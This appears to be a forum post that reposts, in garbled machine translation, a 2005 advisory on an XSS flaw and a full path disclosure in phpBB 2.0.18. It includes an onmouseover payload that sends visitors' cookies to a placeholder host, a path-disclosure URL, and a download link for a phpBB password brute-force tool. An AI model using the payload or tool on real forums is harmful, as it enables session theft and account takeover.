phpBB Forum Program: Duddy Meet new problems _ vulnerability Research

PhpBB 2.0.18 XSS and full Path disclosure

Details:securityalert

There is a brute force to break the tool, single-threaded, there is no great use, really rival opened a phpBB what can also be used to run the password

Download: Http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar
Topic:phpbb 2.0.18 XSS and full Path disclosure

Securityalert id:269

Securityrisk:low

Remote Exploit:yes

Local Exploit:no

Exploit Given:yes

Credit:maksymilian Arciemowicz

date:17.12.2005

Affected Software:phpbb <= 2.0.18

Advisory Text:

-----BEGIN PGP Signed Message-----
Hash:sha1

[PhpBB 2.0.18 XSS and full Path disclosure cxib8o3.22]

Author:maksymilian Arciemowicz (CXIB8O3)
date:16.12.2005
From the Securityreason.com team

----0.Description---
PhpBB is a high powered, fully scalable, and highly customizable Open Source Bulletin Boar
D package. PhpBB has a user-friendly interface, simple and straightforward administration
Panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, Ms-sql, PostgreSQL or ACCESS/ODBC database servers, PhpBB is the ideal free community
Lution for the all Web sites.
Contact with author Http://www.phpbb.com/about.php.

----1. XSS---
If in phpBB is allowed HTML tags ' on ' like B,i,u,pre and have your in profile ' Always al
Low Html:yes "or are to you Guest

That's the can use this tags:

<b c= ">" onmouseover= "alert (' securityreason.com ')" x= "<b" > H E L O </B>

Exploit:

<b c= ">" onmouseover= "alert (document.location= ' http://HOST/cookies? ') +document.cookie)
"x=" <b "> H A L O </B>

and have you cookies.

----2. Full Path Disclosure---
In the file admin/admin_disallow.php is

- -25-31---
if (!empty ($setmodules))
{
$filename = basename (__file__);
$module [' Users '] [' disallow '] = Append_sid ($filename);

Return
}
- -25-31---

function Append_sid () Dosen ' t exists. And if you have:

Register_globals = On
Display_errors = On

Try to go:
Http://[host]/[dir]/admin/admin_disallow.php?setmodules=1

--result ERROR---
Fatal error:call to undefined Function:append_sid () In/www/2018/phpbb2/admin/admin_disa
llow.php on line 28
--result ERROR---

----3. Greets---
Sp3x

----4.Contact---
Author:maksymilian Arciemowicz < Cxib8o3 >
Email:max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
Gpg:http://securityreason.com/key/arciemowicz.maksymilian.gpg
Securityreason.com Team
-----BEGIN PGP SIGNATURE-----
Version:gnupg v1.4.2 (FreeBSD)

id8dbqfdpdtc3ke13x/fto4raoscajkbcyrnbhkdgeuwny1u/wxmhzdnvqcgl39d
/0u14en2sqah1bwu0yvt48q=
=lsl8
-----End PGP SIGNATURE-----

Oh, yes, the top one looks like maybe I guess that's what it means:

Personality Signature:
The personalized signature you fill out is automatically attached at the bottom of your published article. A personality signature has a limit of 512 characters.

Prohibit HTML tags
Allow style labels
Allow expression icons

To find the "Allow HTML tags"